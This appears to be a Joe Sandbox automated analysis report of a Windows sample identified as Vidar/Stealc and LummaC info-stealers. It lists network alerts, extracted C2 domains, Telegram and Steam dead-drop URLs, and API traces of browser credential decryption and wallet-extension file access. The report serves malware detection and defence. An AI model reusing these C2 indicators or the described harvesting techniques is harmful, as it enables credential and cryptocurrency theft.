Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:10.289089+0200
SID:	2049087
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 5.75.212.60 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T18:56:25.309530+0200
SID:	2011803
Source Port:	443
Destination Port:	49747
Protocol:	TCP
Classtype:	Executable code was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 65.108.151.108

Timestamp:	2024-07-26T18:57:27.510944+0200
SID:	2028765
Source Port:	49782
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:56.930642+0200
SID:	2028765
Source Port:	49766
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:18.375938+0200
SID:	2028765
Source Port:	49738
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:24.206359+0200
SID:	2028765
Source Port:	49747
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:13.006417+0200
SID:	2049087
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:35.076390+0200
SID:	2028765
Source Port:	49755
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 5.75.212.60 - Destination IP: 192.168.2.4

Timestamp:	2024-07-26T18:56:11.677300+0200
SID:	2044247
Source Port:	443
Destination Port:	49734
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.4 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T18:56:13.775957+0200
SID:	2028765
Source Port:	49736
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://5.75.212.60/sqls.dll	Avira URL Cloud: Label: malware
Source: callosallsaospz.shop	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/badges	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/1	Avira URL Cloud: Label: malware
Source: https://t.me/s41l0#69	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/5	Avira URL Cloud: Label: malware
Source: https://t.me/armad2a	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/mozglue.dll#	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/F	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/a	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/indows.storage.dlll	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/p	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dll	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199743486170", "https://t.me/s41l0"], "Botnet": "b607a7a47e1a6ff266af835d50c6eaa5"}
Source: MSBuild.exe.7916.8.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "callosallsaospz.shop", "outpointsozp.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\DBAAFIDGDA.exe	ReversingLabs: Detection: 83%
Source: C:\ProgramData\DGDBKFBAKF.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\jen1hg[1].exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gfn1go[1].exe	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\DBAAFIDGDA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\jen1hg[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gfn1go[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\DGDBKFBAKF.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: indexterityszcoxp.shop
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lariatedzugspd.shop
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: callosallsaospz.shop
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: outpointsozp.shop
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: liernessfornicsa.shop
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: upknittsoappz.shop
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: shepherdlyopzc.shop
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: unseaffarignsk.shop
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: liernessfornicsa.shop
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00406D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00406CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	1_2_00410DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00408980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA,	1_2_00408980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C576C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	1_2_6C576C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6CA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6C6CA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6C4440 PK11_PrivDecrypt,	1_2_6C6C4440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C694420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	1_2_6C694420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6C44C0 PK11_PubEncrypt,	1_2_6C6C44C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C7125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	1_2_6C7125B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6A8670 PK11_ExportEncryptedPrivKeyInfo,	1_2_6C6A8670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6CA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	1_2_6C6CA650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6AE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	1_2_6C6AE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6EA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	1_2_6C6EA730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004066DD CryptUnprotectData,LocalAlloc,LocalFree,	6_2_004066DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040667A CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	6_2_0040667A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00407FEE memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,	6_2_00407FEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040F388 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	6_2_0040F388

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.108.151.108:443 -> 192.168.2.4:49781 version: TLS 1.2

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2459852233.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr
Source:	Binary string: converter.pdb source: DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr
Source:	Binary string: PE.pdbH] source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.0000000003321000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1678671142.0000000005950000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softwaretown.pdb source: DBAAFIDGDA.exe, 00000005.00000000.2060267748.00000000009A2000.00000002.00000001.01000000.0000000B.sdmp, DBAAFIDGDA.exe.1.dr, jen1hg[1].exe.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2434980346.0000000037F67000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: converter.pdbx source: DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: fmradiosoft.pdbX source: 1lKbb2hF7fYToopfpmEvlyRN.exe
Source:	Binary string: PE.pdb source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.0000000003321000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1678671142.0000000005950000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2428216684.000000002C086000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\GPgmshZsn.pdb source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1679997283.0000000005D53000.00000004.08000000.00040000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000043DC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2418885416.000000001FD38000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2634247963.00000000066DB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2459852233.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\xlHkJa.pdb source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2185461295.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: fmradiosoft.pdb source: 1lKbb2hF7fYToopfpmEvlyRN.exe
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\hZlPXWfEn.pdb source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2092583255.0000000005BEC000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_004099F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	1_2_004156C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040C2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00415EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	1_2_00414F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00409D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	1_2_00415A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_0040AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040B4B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040B4B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00413C66 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00413C66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004138AA GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	6_2_004138AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00401157 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00401157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041355A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_0041355A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004091E3 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_004091E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00409E5F wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	6_2_00409E5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040A6A6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040A6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00408EB5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_00408EB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00412F4A wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	6_2_00412F4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00409706 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	6_2_00409706

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

1_2_004153C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
